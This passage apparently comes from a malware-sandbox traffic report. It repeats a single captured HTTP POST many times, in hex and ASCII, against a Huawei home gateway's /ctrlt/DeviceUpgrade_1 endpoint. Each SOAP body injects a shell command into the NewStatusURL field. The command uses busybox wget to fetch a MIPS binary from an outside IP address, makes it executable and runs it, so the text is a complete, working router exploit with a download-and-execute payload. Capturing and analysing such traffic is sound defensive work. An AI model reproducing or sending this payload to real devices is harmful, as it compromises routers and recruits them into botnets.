6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
